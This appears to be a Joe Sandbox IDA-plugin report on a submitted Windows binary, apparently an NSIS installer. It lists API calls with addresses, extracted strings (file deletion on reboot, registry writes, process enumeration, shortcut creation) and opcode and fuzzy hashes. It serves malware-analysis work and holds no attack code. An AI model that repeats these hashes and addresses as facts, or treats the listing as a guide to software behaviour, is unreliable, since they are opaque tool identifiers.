                                                                                                                                                                                                                                                                  • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                  • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(FFFFFFFF,00403AFD,?), ref: 00403890
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                  • Opcode ID: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                                                                                                                                  • Instruction ID: 859c8e5cf93c3f84440f38a6d8c6a0cb0ce917112422b96fb642ee91708591da
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 983617adc3fb59bada791ca239273a70529ab93e183a396e050099d658997f71
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BC01231504700D7E5206FB99D4EB043A54A74037DB544B7AF4F5F11F1C77C4645852D
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                  • String ID: $ @$M$N
                                                                                                                                                                                                                                                                  • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                  • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                  • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
• lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
• lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
• lstrlenW.KERNEL32(?), ref: 00406D58
• FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
• FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
• FindClose.KERNEL32(?), ref: 00406E5F
Strings
• Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
• Delete: DeleteFile("%s"), xrefs: 00406DE8
• Delete: DeleteFile failed("%s"), xrefs: 00406E29
• RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
• ptF, xrefs: 00406D1A
• RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
• \*.*, xrefs: 00406D2F
• RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
• RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
Memory Dump Source
• Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
APIs
• GetDlgItem.USER32(?,000003F0), ref: 00404525
• IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
• GetDlgItem.USER32(?,000003FB), ref: 00404553
• GetAsyncKeyState.USER32(00000010), ref: 0040455A
• GetDlgItem.USER32(?,000003F0), ref: 0040456F
• ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
• SetWindowTextW.USER32(?,?), ref: 004045AF
• SHBrowseForFolderW.SHELL32(?), ref: 00404669
• lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
• lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
• CoTaskMemFree.OLE32(00000000), ref: 00404674
  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
• GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
• SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
Similarity
• API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
• String ID: F$A
APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
• ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
• ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
• lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
• lstrcmpA.KERNEL32(name,?), ref: 00406FF3
• CloseHandle.KERNEL32(?), ref: 00407212
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
Similarity
• API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
• String ID: %s: failed opening file "%s"$GetTTFNameString$name
APIs
• GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
• GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
• lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
• lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406A73
Strings
Memory Dump Source
• Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
• String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
APIs
• CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
Strings
• CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
Similarity
• API ID: CreateInstance
• String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
APIs
• GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
• lstrlenW.KERNEL32(?), ref: 004063F8
• GetVersionExW.KERNEL32(?), ref: 00406456
  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
• LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
• FreeLibrary.KERNEL32(00000000), ref: 00406500
• GlobalFree.KERNEL32(?), ref: 00406509
Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                  • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                  • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                  • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                    • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                    • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                  • String ID: F$N$open
                                                                                                                                                                                                                                                                  • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                  • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                  • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                    • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                  • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                  • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                  • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                  • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                  • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                  • String ID: F
                                                                                                                                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                  • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                  • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
